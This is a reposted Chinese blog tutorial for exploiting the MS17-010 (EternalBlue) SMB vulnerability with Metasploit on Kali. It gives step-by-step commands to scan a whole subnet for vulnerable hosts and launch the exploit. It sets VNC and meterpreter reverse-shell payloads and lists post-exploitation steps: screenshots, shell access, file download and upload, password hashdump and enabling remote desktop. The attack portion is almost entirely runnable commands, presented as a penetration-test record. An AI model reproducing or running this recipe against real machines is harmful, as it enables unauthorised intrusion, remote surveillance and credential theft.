永恒之蓝其实是利用了微软的MS17-010漏洞。MS17-010是Windows系统一个底层服务的漏洞,通过这个漏洞可以影响445端口。***就是通过在网络上扫描开放的445端口,然后把***病毒植入被***电脑。
这里使用MSF 实现 “永恒之蓝”的快速***,就是利用Metasploit中针对ms17-101漏洞的***载荷进行***获取主机控制权限。我这里简单的记录下整个***利用所需要的工具准备、利用过程以及后***的一些简单内容。
本次***测试在kali中进行
首先 扫描局域网存在漏洞主机
msfconsole #启动msf
use auxiliary/scanner/smb/smb_ms17_010 #加载ms_17_010模块
show options #查看配置
(这里可以看到RHOSTS后边的required为yes 所以必须设置,为no的则不必须)
set RHOSTS 192.168.0.0/16 #设置扫描网段 RHOSTS(RHOSTS表示多个ip)
(这里可以看到THREADS为1 速度太慢 我们设置成100)
set THREADS 100 #设置线程为100
run #启动
接下来就是等待扫描结果看看哪个可以利用
其次 进行***(另一个shell窗口中进行)
msfconsole #启动msf
search ms17_010 #搜索******模块
(这里看到搜索到******模块2个,但是他们是一样的)
use exploit/windows/smb/ms17_010_eternalblue #加载******模块
show options #展示***载荷
(这里看到需要设置RHOST 将上边扫描到的可利用主机ip 设置为RHOST)
set RHOST [ip] #RHOST 仅一个ip
接下来是设置***载荷payload,不同的payload有不同的功能
#设置***载荷①
set payload windows/x64/vncinject/bind_tcp #用于屏幕监控
exploit
然后你就可以看到他的屏幕了
#设置***载荷②
set payload windows/x64/meterpreter/reverse_tcp
show options #查看所需配置
set LHOST [本机ip] #配置参数
exploit #进行***
**********此***载荷下有很多命令,不一一细说**************
********** 只说几个简单的 ***************
********** 截屏 screenshot ***************
********** 屏幕监控 run vnc (若对方电脑上有安全软件会不稳定或者失败)
********** 进入对方cmd shell *****************
********** 进入cmd之后命令可就多了 你懂得 **************
********** 下载文件 download filepath **************
********** 上传文件 upload 本机path 对方path *************
********** 获得密码hash hashdump ******************
********** 开启3389远程桌面 run post/windows/manage/enable_rdp
***********************************************************
更多 更详细的内容请参照 http://helloeveryone.blog.51cto.com/6171143/1112040/
转载于:https://blog.51cto.com/dongxiaoyang/1966978